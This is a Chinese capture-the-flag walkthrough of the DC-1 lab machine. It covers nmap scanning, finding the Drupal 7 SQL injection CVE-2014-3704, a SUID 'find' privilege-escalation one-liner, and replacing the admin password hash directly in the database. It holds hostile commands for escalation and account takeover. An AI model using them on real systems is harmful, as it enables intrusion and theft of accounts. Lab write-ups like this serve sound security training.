DC1靶场练习

目录

一，信息收集

二，漏洞扫描 

三，漏洞利用（获取webshell）

四，权限提升

五，寻找文件

六，总结

目标：该靶场有5个flag文件，找到这5个文件

一，信息收集

1，确定靶场主机和IP地址

确定该主机的IP是192.168.101.42

2，扫描端口

nmap -A -P0 -p- -sS --min-rate 10000 192.168.101.42
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 01:22 EDT
Nmap scan report for 192.168.101.42
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36890/tcp   status
|   100024  1          40020/udp6  status
|   100024  1          44827/udp   status
|_  100024  1          51483/tcp6  status
36890/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:45:F7:D8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.101.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds

 开放端口：22，80，111，36890.

二，漏洞扫描 

使用nmap中的vuln模块进行漏洞扫描

nmap --script=vuln -p 80,22,111,36890 192.168.101.42
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 01:26 EDT
Nmap scan report for 192.168.101.42
Host is up (0.00043s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.101.42
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.101.42:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.101.42:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.101.42:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.101.42:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|     
|     Path: http://192.168.101.42:80/user/
|     Form id: user-login
|     Form action: /user/
|     
|     Path: http://192.168.101.42:80/user
|     Form id: user-login
|_    Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
|       http://www.securityfocus.com/bid/70595
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_      https://www.drupal.org/SA-CORE-2014-005
111/tcp   open  rpcbind
36890/tcp open  unknown
MAC Address: 00:0C:29:45:F7:D8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 138.38 seconds

漏洞编号：CVE-2014-3704

该漏洞简介，可以利用漏洞获取webshell

三，漏洞利用（获取webshell）

使用msf对该漏洞进行搜索

四，权限提升

1，使用python进行交互式shell

 python -c "import pty;pty.spawn('/bin/bash')"

2,查看具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

3，使用find文件进行提权

 find 123 -exec '/bin/sh' \;

五，寻找文件

已经找到了flag1和flag2文件，先查看文件1

Every good CMS needs a config file - and so do you.

每个好的CMS都需要一个配置文件——你也一样。

搜索到drupal7的配置文件是settings.php ，查找该文件。

查看该配置文件发现了Flag2文件

登录数据库

已经查找到了用户名和密码，但是密码已经被加密了，采用的是哈希密码，破解难度比较大。

思路：现在我们可以登录进来数据库，可以采用替换的方式，找到靶机的加密算法，将我们设定的密码转换成哈希密码，替换users表中的密码 

drupal默认使用password_hash.sh生成密码。

查找该文件

使用该文件生成哈希密码

 替换admin密码

update drupaldb.users set pass="$S$DBi2slgpGSlKKNNj9vLcOmtPqnVzZQCaAl7NUGPfjrLTBsf.hfOn" where name="admin"; 

在content中找到了flag3文件

大概意思就是查找passwd文件来找寻flag4文件，但是前面我们已经提权成功利用find命令找到了flag4文件，所以现在直接查看就行

前面已经提权成功，直接查看root目录就可以了

六，总结

1，drupal7的配置文件是settings.php

2,  drupal默认使用password_hash.sh生成密码。